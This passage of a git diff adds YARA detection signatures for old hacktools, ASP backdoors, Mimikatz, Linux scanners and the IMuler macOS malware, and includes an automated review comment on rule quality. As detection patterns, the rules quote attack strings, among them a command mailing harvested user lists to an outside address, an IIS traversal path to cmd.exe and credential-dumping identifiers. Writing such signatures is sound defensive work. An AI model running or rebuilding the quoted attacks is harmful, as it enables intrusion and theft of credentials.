+		$s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii
+		$s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii
+		$s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii
+		$s5 = "Public Property Get oFS()" fullword ascii
+	condition:
+		all of them
+}
+
+rule CleanIISLog {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
+	strings:
+		$s1 = "CleanIP - Specify IP Address Which You Want Clear." fullword ascii
+		$s2 = "LogFile - Specify Log File Which You Want Process." fullword ascii
+		$s8 = "CleanIISLog Ver" fullword ascii
+		$s9 = "msftpsvc" fullword ascii
+		$s10 = "Fatal Error: MFC initialization failed" fullword ascii
+		$s11 = "Specified \"ALL\" Will Process All Log Files." fullword ascii
+		$s12 = "Specified \".\" Will Clean All IP Record." fullword ascii
+		$s16 = "Service %s Stopped." fullword ascii
+		$s20 = "Process Log File %s..." fullword ascii
+	condition:
+		5 of them
+}
+
+rule sqlcheck {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7"
+	strings:
+		$s0 = "Power by eyas<cooleyas@21cn.com>" fullword ascii
+		$s3 = "\\ipc$ \"\" /user:\"\"" fullword ascii
+		$s4 = "SQLCheck can only scan a class B network. Try again." fullword ascii
+		$s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" fullword ascii
+		$s20 = "Usage: SQLCheck <StartIP> <EndIP>" fullword ascii
+	condition:
+		3 of them
+}
+
+rule sig_238_RunAsEx {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35"
+	strings:
+		$s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" fullword ascii
+		$s8 = "cmd.bat" fullword ascii
+		$s9 = "Note: This Program Can'nt Run With Local Machine." fullword ascii
+		$s11 = "%s Execute Succussifully." fullword ascii
+		$s12 = "winsta0" fullword ascii
+		$s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" fullword ascii
+	condition:
+		4 of them
+}
+
+rule sig_238_nbtdump {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file nbtdump.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8"
+	strings:
+		$s0 = "Creation of results file - \"%s\" failed." fullword ascii
+		$s1 = "c:\\>nbtdump remote-machine" fullword ascii
+		$s7 = "Cerberus NBTDUMP" fullword ascii
+		$s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" fullword ascii
+		$s18 = "<P><H3>Account Information</H3><PRE>" fullword wide
+		$s19 = "%s's password is %s</H3>" fullword wide
+		$s20 = "%s's password is blank</H3>" fullword wide
+	condition:
+		5 of them
+}
+
+rule sig_238_Glass2k {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Glass2k.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a"
+	strings:
+		$s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" fullword ascii
+		$s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" fullword ascii
+		$s3 = "WINNT\\System32\\stdole2.tlb" fullword ascii
+		$s4 = "Glass2k.exe" fullword wide
+		$s7 = "NeoLite Executable File Compressor" fullword ascii
+	condition:
+		all of them
+}
+
+rule SplitJoin_V1_3_3_rar_Folder_3 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "21409117b536664a913dcd159d6f4d8758f43435"
+	strings:
+		$s2 = "ie686@sohu.com" fullword ascii
+		$s3 = "splitjoin.exe" fullword ascii
+		$s7 = "SplitJoin" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspbackdoor_EDIT {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EDIT.ASP"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb"
+	strings:
+		$s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii
+		$s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii
+		$s3 = "response.write \"<a href='index.asp'>" fullword ascii
+		$s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii
+		$s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii
+		$s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii
+		$s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii
+	condition:
+		5 of them
+}
+
+rule aspbackdoor_entice {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file entice.asp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183"
+	strings:
+		$s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii
+		$s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii
+		$s4 = "conndb.Execute(sqllanguage)" fullword ascii
+		$s5 = "<!--#include file=sqlconn.asp-->" fullword ascii
+		$s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii
+	condition:
+		all of them
+}
+
+rule FPipe2_0 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "891609db7a6787575641154e7aab7757e74d837b"
+	strings:
+		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
+		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
+		$s2 = " -s    - outbound connection source port number" fullword ascii
+		$s3 = "source port for that outbound connection being set to 53 also." fullword ascii
+		$s4 = "http://www.foundstone.com" fullword ascii
+		$s19 = "FPipe" fullword ascii
+	condition:
+		all of them
+}
+
+rule InstGina {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file InstGina.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "5317fbc39508708534246ef4241e78da41a4f31c"
+	strings:
+		$s0 = "To Open Registry" fullword ascii
+		$s4 = "I love Candy very much!!" ascii
+		$s5 = "GinaDLL" fullword ascii
+	condition:
+		all of them
+}
+
+rule ArtTray_zip_Folder_ArtTray {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ArtTray.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "ee1edc8c4458c71573b5f555d32043cbc600a120"
+	strings:
+		$s0 = "http://www.brigsoft.com" fullword wide
+		$s2 = "ArtTrayHookDll.dll" fullword ascii
+		$s3 = "ArtTray Version 1.0 " fullword wide
+		$s16 = "TRM_HOOKCALLBACK" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_findoor {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file findoor.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce"
+	strings:
+		$s0 = "(non-Win32 .EXE or error in .EXE image)." fullword ascii
+		$s8 = "PASS hacker@hacker.com" fullword ascii
+		$s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" fullword ascii
+		$s10 = "MAIL FROM:hacker@hacker.com" fullword ascii
+		$s11 = "http://isno.yeah.net" fullword ascii
+	condition:
+		4 of them
+}
+
+rule aspbackdoor_ipclear {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ipclear.vbs"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098"
+	strings:
+		$s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii
+		$s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii
+		$s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii
+		$s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii
+		$s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+	condition:
+		all of them
+}
+
+rule WinEggDropShellFinal_zip_Folder_InjectT {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "516e80e4a25660954de8c12313e2d7642bdb79dd"
+	strings:
+		$s0 = "Packed by exe32pack" ascii
+		$s1 = "2TInject.Dll" fullword ascii
+		$s2 = "Windows Services" fullword ascii
+		$s3 = "Findrst6" fullword ascii
+		$s4 = "Press Any Key To Continue......" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_rshsvc {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file rshsvc.bat"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "fb15c31254a21412aecff6a6c4c19304eb5e7d75"
+	strings:
+		$s0 = "if not exist %1\\rshsetup.exe goto ERROR2" fullword ascii
+		$s1 = "ECHO rshsetup.exe is not found in the %1 directory" fullword ascii
+		$s9 = "REM %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dll" fullword ascii
+		$s10 = "copy %1\\rshsvc.exe" fullword ascii
+		$s12 = "ECHO Use \"net start rshsvc\" to start the service." fullword ascii
+		$s13 = "rshsetup %SystemRoot%\\system32\\rshsvc.exe %SystemRoot%\\system32\\rshsvc.dll" fullword ascii
+		$s18 = "pushd %SystemRoot%\\system32" fullword ascii
+	condition:
+		all of them
+}
+
+rule gina_zip_Folder_gina {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file gina.dll"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "e0429e1b59989cbab6646ba905ac312710f5ed30"
+	strings:
+		$s0 = "NEWGINA.dll" fullword ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s3 = "WlxActivateUserShell" fullword ascii
+		$s6 = "WlxWkstaLockedSAS" fullword ascii
+		$s13 = "WlxIsLockOk" fullword ascii
+		$s14 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s16 = "WlxShutdown" fullword ascii
+		$s17 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+	condition:
+		all of them
+}
+
+rule superscan3_0 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d"
+	strings:
+		$s0 = "\\scanner.ini" fullword ascii
+		$s1 = "\\scanner.exe" fullword ascii
+		$s2 = "\\scanner.lst" fullword ascii
+		$s4 = "\\hensss.lst" fullword ascii
+		$s5 = "STUB32.EXE" fullword wide
+		$s6 = "STUB.EXE" fullword wide
+		$s8 = "\\ws2check.exe" fullword ascii
+		$s9 = "\\trojans.lst" fullword ascii
+		$s10 = "1996 InstallShield Software Corporation" fullword wide
+	condition:
+		all of them
+}
+
+rule sig_238_xsniff {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file xsniff.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
+	strings:
+		$s2 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
+		$s3 = "%s - simple sniffer for win2000" fullword ascii
+		$s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
+		$s5 = "HOST: %s USER: %s, PASS: %s" fullword ascii
+		$s7 = "http://www.xfocus.org" fullword ascii
+		$s9 = "  -pass        : Filter username/password" fullword ascii
+		$s18 = "  -udp         : Output udp packets" fullword ascii
+		$s19 = "Code by glacier <glacier@xfocus.org>" fullword ascii
+		$s20 = "  -tcp         : Output tcp packets" fullword ascii
+	condition:
+		6 of them
+}
+
+rule sig_238_fscan {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file fscan.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "d5646e86b5257f9c83ea23eca3d86de336224e55"
+	strings:
+		$s0 = "FScan v1.12 - Command line port scanner." fullword ascii
+		$s2 = " -n    - no port scanning - only pinging (unless you use -q)" fullword ascii
+		$s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" fullword ascii
+		$s6 = " -z    - maximum simultaneous threads to use for scanning" fullword ascii
+		$s12 = "Failed to open the IP list file \"%s\"" fullword ascii
+		$s13 = "http://www.foundstone.com" fullword ascii
+		$s16 = " -p    - TCP port(s) to scan (a comma separated list of ports/ranges) " fullword ascii
+		$s18 = "Bind port number out of range. Using system default." fullword ascii
+		$s19 = "fscan.exe" fullword wide
+	condition:
+		4 of them
+}
+
+rule _iissample_nesscan_twwwscan {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		super_rule = 1
+		hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862"
+		hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b"
+		hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f"
+	strings:
+		$s0 = "Connecting HTTP Port - Result: " fullword
+		$s1 = "No space for command line argument vector" fullword
+		$s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword
+		$s5 = "No space for copy of command line" fullword
+		$s7 = "-  Windows NT,2000 Patch Method  - " fullword
+		$s8 = "scanf : floating point formats not linked" fullword
+		$s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword
+		$s13 = "!\"what?\"" fullword
+		$s14 = "%s Port %d Closed" fullword
+		$s16 = "printf : floating point formats not linked" fullword
+		$s17 = "xxtype.cpp" fullword
+	condition:
+		all of them
+}
+
+rule _FsHttp_FsPop_FsSniffer {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		super_rule = 1
+		hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f"
+		hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9"
+		hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8"
+	strings:
+		$s0 = "-ERR Invalid Command, Type [Help] For Command List" fullword
+		$s1 = "-ERR Get SMS Users ID Failed" fullword
+		$s2 = "Control Time Out 90 Secs, Connection Closed" fullword
+		$s3 = "-ERR Post SMS Failed" fullword
+		$s4 = "Current.hlt" fullword
+		$s6 = "Histroy.hlt" fullword
+		$s7 = "-ERR Send SMS Failed" fullword
+		$s12 = "-ERR Change Password <New Password>" fullword
+		$s17 = "+OK Send SMS Succussifully" fullword
+		$s18 = "+OK Set New Password: [%s]" fullword
+		$s19 = "CHANGE PASSWORD" fullword
+	condition:
+		all of them
+}
+
+rule Ammyy_Admin_AA_v3 {
+	meta:
+		description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe"
+		author = "Florian Roth"
+		reference = "http://goo.gl/gkAg2E"
+		date = "2014/12/22"
+		score = 55
+		hash1 = "b130611c92788337c4f6bb9e9454ff06eb409166"
+		hash2 = "07539abb2623fe24b9a05e240f675fa2d15268cb"		
+	strings:
+		$x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" fullword ascii
+		$x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" fullword ascii
+		$x3 = "Global\\Ammyy.Target.IncomePort" fullword ascii
+		$x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" fullword ascii
+		$x5 = "Please enter password for accessing remote computer" fullword ascii
+		
+		$s1 = "CreateProcess1()#3 %d error=%d" fullword ascii
+		$s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." fullword ascii
+		$s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" fullword ascii
+		$s4 = "ERROR: FindProcessByName('explorer.exe')" fullword ascii
+	condition:
+		2 of ($x*) or all of ($s*)
+}
+
+/* Other dumper and custom hack tools */
+
+rule Mimikatz_Samples_2014b_1 {
+	meta:
+		description = "Mimikatz pwassword dumper samples from the second half of 2014"
+		author = "Florian Roth with the help of YarGen Rule Generator"
+		reference = "not set"
+		date = "2014/12/23"
+		score = 80
+		hash = "ef5bd09b2e5836b58a8b27c1fb3650621aaf6488"
+	strings:
+		$s1 = "Raw command (not implemented yet) : %s" fullword wide
+		$s3 = " ! ZwSetInformationProcess 0x%08x for %u/%-14S" fullword wide
+		$s6 = "PsSetCreateProcessNotifyRoutineEx" fullword wide
+		$s10 = "\\Device\\mimidrv" fullword wide
+		$s16 = "\\DosDevices\\mimidrv" fullword wide
+		$s17 = "All privileges for the access token from %u/%-14S" fullword wide
+		$s20 = "in (0x%p - %u) ; out (0x%p - %u)" fullword wide
+	condition:
+		all of them
+}
+
+rule Mimikatz_Samples_2014b_2 {
+	meta:
+		description = "Mimikatz pwassword dumper samples from the second half of 2014"
+		author = "Florian Roth with the help of YarGen Rule Generator"
+		reference = "not set"
+		date = "2014/12/23"
+		score = 80		
+		hash = "98033f5bbdd79b12a7804bad0698c91e6d5067ad"
+	strings:
+		$s0 = "0: kd> .process /r /p <EPROCESS address>" fullword ascii
+		$s4 = "%p - lsasrv!LogonSessionListCount" fullword ascii
+		$s7 = "%p - lsasrv!LogonSessionList" fullword ascii
+		$s12 = "livessp!LiveGlobalLogonSessionList" fullword ascii
+		$s13 = "UndefinedLogonType" fullword ascii
+		$s14 = "[ERROR] [CRYPTO] Acquire keys" fullword ascii
+		$s15 = "masterkey" fullword ascii
+		$s16 = "kerberos!KerbGlobalLogonSessionTable" fullword ascii
+		$s17 = "RemoteInteractive" fullword ascii
+		$s18 = "mimilib.dll" fullword wide
+		$s19 = "%p - lsasrv!InitializationVector" fullword ascii
+		$s20 = "lsasrv!LogonSessionListCount" fullword ascii
+	condition:
+		all of them
+}
+
+rule Mimikatz_Samples_2014b_Family_2 {
+	meta:
+		description = "Mimikatz pwassword dumper samples from the second half of 2014"
+		author = "Florian Roth with the help of YarGen Rule Generator"
+		date = "2014/12/23"
+		super_rule = 1
+		score = 80		
+		hash0 = "61001a32c5388e629dd0441a77974200057816ef"
+		hash1 = "46df272cecb541aebca3c863802c0d0a0dc5fcb4"
+		hash2 = "c3307bb70efa19fc5049dfd829d07ea52a65bb74"
+		hash3 = "29d9bfc4e4884bc7b2f3cd01960b727c17fb50cb"
+		hash4 = "ac1d1db32ca6e7af5625f0f6fbe210fe68002b5c"
+	strings:
+		$s0 = "ncryptprov.dll" fullword wide
+		$s1 = "CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY" fullword wide
+		$s2 = "logonPasswords" fullword wide
+		$s3 = "CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE" fullword wide
+		$s4 = "CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY" fullword wide
+		$s5 = "inject" fullword wide
+		$s6 = "MS_DEF_RSA_SCHANNEL_PROV" fullword wide
+		$s7 = "MS_ENHANCED_PROV" fullword wide
+		$s8 = "MS_DEF_RSA_SIG_PROV" fullword wide
+		$s9 = "privilege" fullword wide
+		$s10 = "MS_ENH_RSA_AES_PROV" fullword wide
+		$s16 = "sekurlsa" fullword wide
+		$s17 = "answer" fullword wide
+		$s18 = "secrets" fullword wide
+		$s19 = "MS_DEF_DSS_PROV" fullword wide
+		$s20 = "MS_DEF_PROV" fullword wide
+	condition:
+		all of them
+}
+
+rule LinuxHacktool_eyes_screen {
+	meta:
+		description = "Linux hack tools - file screen"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "a240a0118739e72ff89cefa2540bf0d7da8f8a6c"
+	strings:
+		$s0 = "or: %s -r [host.tty]" fullword ascii
+		$s1 = "%s: process: character, ^x, or (octal) \\032 expected." fullword ascii
+		$s2 = "Type \"screen [-d] -r [pid.]tty.host\" to resume one of them." fullword ascii
+		$s6 = "%s: at [identifier][%%|*|#] command [args]" fullword ascii
+		$s8 = "Slurped only %d characters (of %d) into buffer - try again" fullword ascii
+		$s11 = "command from %s: %s %s" fullword ascii
+		$s16 = "[ Passwords don't match - your armor crumbles away ]" fullword ascii
+		$s19 = "[ Passwords don't match - checking turned off ]" fullword ascii
+	condition:
+		all of them
+}
+
+rule LinuxHacktool_eyes_scanssh {
+	meta:
+		description = "Linux hack tools - file scanssh"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "467398a6994e2c1a66a3d39859cde41f090623ad"
+	strings:
+		$s0 = "Connection closed by remote host" fullword ascii
+		$s1 = "Writing packet : error on socket (or connection closed): %s" fullword ascii
+		$s2 = "Remote connection closed by signal SIG%s %s" fullword ascii
+		$s4 = "Reading private key %s failed (bad passphrase ?)" fullword ascii
+		$s5 = "Server closed connection" fullword ascii
+		$s6 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
+		$s8 = "checking for version `%s' in file %s required by file %s" fullword ascii
+		$s9 = "Remote host closed connection" fullword ascii
+		$s10 = "%s: line %d: bad command `%s'" fullword ascii
+		$s13 = "verifying that server is a known host : file %s not found" fullword ascii
+		$s14 = "%s: line %d: expected service, found `%s'" fullword ascii
+		$s15 = "%s: line %d: list delimiter not followed by domain" fullword ascii
+		$s17 = "Public key from server (%s) doesn't match user preference (%s)" fullword ascii
+	condition:
+		all of them
+}
+rule LinuxHacktool_eyes_scanner {
+	meta:
+		description = "Linux hack tools - file scanner"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "5488698b7f9090f45096517e61768efd32299d5b"
+	strings:
+		$s0 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
+		$s1 = "checking for version `%s' in file %s required by file %s" fullword ascii
+		$s3 = "%s: line %d: expected service, found `%s'" fullword ascii
+		$s4 = "truncated dump file; tried to read %d header bytes, only got %lu" fullword ascii
+		$s5 = "%s: line %d: list delimiter not followed by domain" fullword ascii
+		$s7 = "'protochain' not supported with radiotap headers" fullword ascii
+		$s8 = "%s(): unsuported injection type" fullword ascii
+		$s9 = "ELF load command address/offset not properly aligned" fullword ascii
+		$s10 = "@(#) $Header: /tcpdump/master/libpcap/gencode.c,v 1.221.2.27 2005/07/14 16:01:46" ascii
+		$s20 = "%s%s%s:%u: %s%sAssertion `%s' failed." fullword ascii
+	condition:
+		4 of them
+}
+rule LinuxHacktool_eyes_pscan2 {
+	meta:
+		description = "Linux hack tools - file pscan2"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "56b476cba702a4423a2d805a412cae8ef4330905"
+	strings:
+		$s0 = "# pscan completed in %u seconds. (found %d ips)" fullword ascii
+		$s1 = "Usage: %s <b-block> <port> [c-block]" fullword ascii
+		$s3 = "%s.%d.* (total: %d) (%.1f%% done)" fullword ascii
+		$s8 = "Invalid IP." fullword ascii
+		$s9 = "# scanning: " fullword ascii
+		$s10 = "Unable to allocate socket." fullword ascii
+	condition:
+		2 of them
+}
+
+rule LinuxHacktool_eyes_a {
+	meta:
+		description = "Linux hack tools - file a"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "458ada1e37b90569b0b36afebba5ade337ea8695"
+	strings:
+		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
+		$s1 = "mv scan.log bios.txt" fullword ascii
+		$s2 = "rm -rf bios.txt" fullword ascii
+		$s3 = "echo -e \"# by Eyes.\"" fullword ascii
+		$s4 = "././pscan2 $1 22" fullword ascii
+		$s10 = "echo \"#cautam...\"" fullword ascii
+	condition:
+		2 of them
+}
+
+rule LinuxHacktool_eyes_mass {
+	meta:
+		description = "Linux hack tools - file mass"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "2054cb427daaca9e267b252307dad03830475f15"
+	strings:
+		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
+		$s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii
+		$s3 = "killall -9 pscan2" fullword ascii
+		$s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES}  [*]\"" fullword ascii
+		$s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" fullword ascii
+	condition:
+		1 of them
+}
+
+rule LinuxHacktool_eyes_pscan2_2 {
+	meta:
+		description = "Linux hack tools - file pscan2.c"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "eb024dfb441471af7520215807c34d105efa5fd8"
+	strings:
+		$s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" fullword ascii
+		$s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" fullword ascii
+		$s3 = "printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - sca" ascii
+		$s19 = "connlist[i].addr.sin_family = AF_INET;" fullword ascii
+		$s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," fullword ascii
+	condition:
+		2 of them
+}
+
+rule CN_Portscan : APT
+{
+    meta:
+        description = "CN Port Scanner"
+        author = "Florian Roth"
+        release_date = "2013-11-29"
+        confidential = false
+		score = 70
+    strings:
+    	$s1 = "MZ"
+		$s2 = "TCP 12.12.12.12"
+    condition:
+        ($s1 at 0) and $s2
+}
+
+rule WMI_vbs : APT 
+{
+    meta:
+        description = "WMI Tool - APT"
+        author = "Florian Roth"
+        release_date = "2013-11-29"
+        confidential = false
+		score = 70
+    strings:
+		$s3 = "WScript.Echo \"   $$\\      $$\\ $$\\      $$\\ $$$$$$\\ $$$$$$$$\\ $$\\   $$\\ $$$$$$$$\\  $$$$$$"  
+    condition:
+        all of them	
+}
+
diff --git a/malware/IMuler.yar b/malware/IMuler.yar
new file mode 100644
index 0000000..d229d40
--- /dev/null
+++ b/malware/IMuler.yar
@@ -0,0 +1,67 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule IMulerCode : IMuler Family 
+{
+    meta:
+        description = "IMuler code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-16"
+        
+    strings:
+        // Load these function strings 4 characters at a time. These check the first two blocks:
+        $L4_tmpSpotlight = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 53 70 6F }
+        $L4_TMPAAABBB = { C7 ?? ?? ?? ?? ?? 54 4D 50 41 C7 ?? ?? ?? ?? ?? 41 41 42 42 }
+        $L4_FILEAGENTVer = { C7 ?? 46 49 4C 45 C7 ?? 04 41 47 45 4E }
+        $L4_TMP0M34JDF8 = { C7 ?? ?? ?? ?? ?? 54 4D 50 30 C7 ?? ?? ?? ?? ?? 4D 33 34 4A }
+        $L4_tmpmdworker = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 2E 6D 64 }
+        
+    condition:
+        any of ($L4*)
+}
+
+rule IMulerStrings : IMuler Family
+{
+    meta:
+        description = "IMuler Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-16"
+        
+    strings:
+        $ = "/cgi-mac/"
+        $ = "xnocz1"
+        $ = "checkvir.plist"
+        $ = "/Users/apple/Documents/mac back"
+        $ = "iMuler2"
+        $ = "/Users/imac/Desktop/macback/"
+        $ = "xntaskz.gz"
+        $ = "2wmsetstatus.cgi"
+        $ = "launch-0rp.dat"
+        $ = "2wmupload.cgi"
+        $ = "xntmpz"
+        $ = "2wmrecvdata.cgi"
+        $ = "xnorz6"
+        $ = "2wmdelfile.cgi"
+        $ = "/LanchAgents/checkvir"
+        $ = "0PERA:%s"
+        $ = "/tmp/Spotlight"
+        $ = "/tmp/launch-ICS000"
+        
+    condition:
+        any of them
+}
+
+rule IMuler : Family
+{
+    meta:
+        description = "IMuler"
+        author = "Seth Hardy"
+        last_modified = "2014-06-16"
+        
+    condition:
+        IMulerCode or IMulerStrings
+}
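Review bot: `import "pe"` at the top of IMuler.yar is unused: none of the three rules reads a `pe.` field, and the paths matched (`/tmp/Spotlight`, `/Users/imac/Desktop/macback/`, `/LanchAgents/checkvir`) point at macOS samples where the PE module would not apply anyway, so the import can be dropped. In IMulerStrings, `any of them` over text strings without `fullword` means a single hit on a short token such as `xntmpz` or `iMuler2` fires the rule (and through IMuler the family rule too); if that breadth is not intended, adding `fullword` or tightening to `2 of them` would limit false positives, though I cannot judge string uniqueness from the listing alone. A one-line `description` on IMuler that says it combines the code and string rules, rather than repeating the name, would also help readers.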
diff --git a/malware/Install11.yar b/malware/Install11.yar
new file mode 100644
index 0000000..3ec2b79
--- /dev/null
+++ b/malware/Install11.yar
@@ -0,0 +1,50 @@
+/*
